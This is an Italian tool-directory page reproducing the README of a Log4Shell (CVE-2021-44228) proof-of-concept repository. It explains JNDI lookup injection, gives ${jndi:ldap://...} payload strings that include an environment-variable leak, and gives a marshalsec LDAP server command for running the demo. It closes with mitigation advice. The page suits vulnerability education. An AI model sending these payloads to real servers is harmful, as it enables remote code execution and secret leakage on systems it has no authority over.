Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228-example — POC di vulnerabilità | Kitploit
Strumenti/GitHubGitHub/kosmx/cve-2021-44228-example
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso Remoto
GitHubkosmx/cve-2021-44228-example

CVE-2021-44228-example

POC di vulnerabilità

Vedi Repository
7214 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Questo è un esempio di sfruttamento di CVE-2021-44228

Una vulnerabilità RCE di Log4J2


Non sono responsabile di questo codice. PER FAVORE non usarlo in modo dannoso

CVE-2021-44228:
Questa vulnerabilità consente di eseguire codice arbitrario registrando un messaggio dannoso sulla macchina target.
Ad esempio, puoi usarla in Minecraft inviando un messaggio in chat, e la macchina del server/giocatore registrerà il messaggio di chat ed eseguirà il tuo codice.
Video di LiveOverflow/CVE-2021-44228

Il messaggio deve contenere un segnaposto ${} con l'istruzione per caricare un oggetto remoto tramite l'API . Caricherà l'oggetto attraverso un

Scarica lo strumento
jndi
ObjectFactory
  • LDAP ldap://x.x.x.x:port/...
  • HTTP http://x.x.x.x/...
  • DNS dns://x.x.x/...
  • ecc...

${jndi:ldap://127.0.0.1:1389/#}

Se l'ObjectFactory non è presente nel client, non farà nulla.
Tranne che risolvere il server.
Con questo, puoi far trapelare variabili d'ambiente:

${jndi:ldap://127.0.0.1:1389/${env:java_home}}

Perché tutto questo hype su questa RCE?

perché così tanto hype?
Se la mia comprensione è corretta, fornisce un'interfaccia a JNDI

Cosa può essere sfruttato

JNDI JDAP è un'API di lookup di oggetti.
Puoi ottenere un oggetto Java da un server.
marshalsec/LDAPRefServer
Invia i dati dell'oggetto e il nome dell'ObjectFactory, che dovrebbe costruire l'oggetto sul client.
Può essere sfruttato in più modi.
Se LDAP è configurato per fidarsi di codice esterno, dobbiamo solo fornire l'URL a un ObjectFactory malintenzionato.
com.sun.jndi.ldap.object.trustURLCodebase = true
Oppure esiste un'altra vulnerabilità Java. JDK-8196902
Combinata con quella, diventa davvero una RCE.
Molti repository POC fanno questo su GitHub. Ad esempio tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Se questo è impostato su false (di default è impostato su false), possiamo cercare un ObjectFactory sfruttabile nel codebase del target,
Oppure sfruttare JNDI in un modo diverso.

Ulteriori letture sull'iniezione JNDI:
JNDI injection
Veracode Research/rogue-jndi

Nell'esempio:

RCEExample è una funzione che registra il messaggio dannoso.
Basta premere Run per eseguirla...

LoggerFactory è un ObjectFactory che registrerà qualunque cosa riceva...
Se compili marshalsec, puoi chiedergli di usare LoggerFactory

  1. java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1/#LoggerFactory"
  2. Esegui rce.RCEExample e osserva lo sfruttamento (il logger).
  3. Puoi eseguire il debug di questo progetto e posizionare un breakpoint in LoggerFactory, per vedere gli oggetti.

Metti al sicuro il tuo programma

Il tuo programma non è vulnerabile SE registra solo messaggi integrati.
Se il programma può registrare testo da qualsiasi file di dati o dalla rete, è vulnerabile.
Ma dovresti sistemarlo comunque...

La cosa migliore che puoi fare è aggiornare a Log4J2 2.15.0+
Se per qualche motivo non è possibile, disabilita il lookup JNDI con il seguente argomento Java: ‐Dlog4j2.formatMsgNoLookups=True per mitigare la vulnerabilità.

Se sei un amministratore di server Minecraft, segui la guida ufficiale: MESSAGGIO IMPORTANTE: VULNERABILITÀ DI SICUREZZA NELLA JAVA EDITION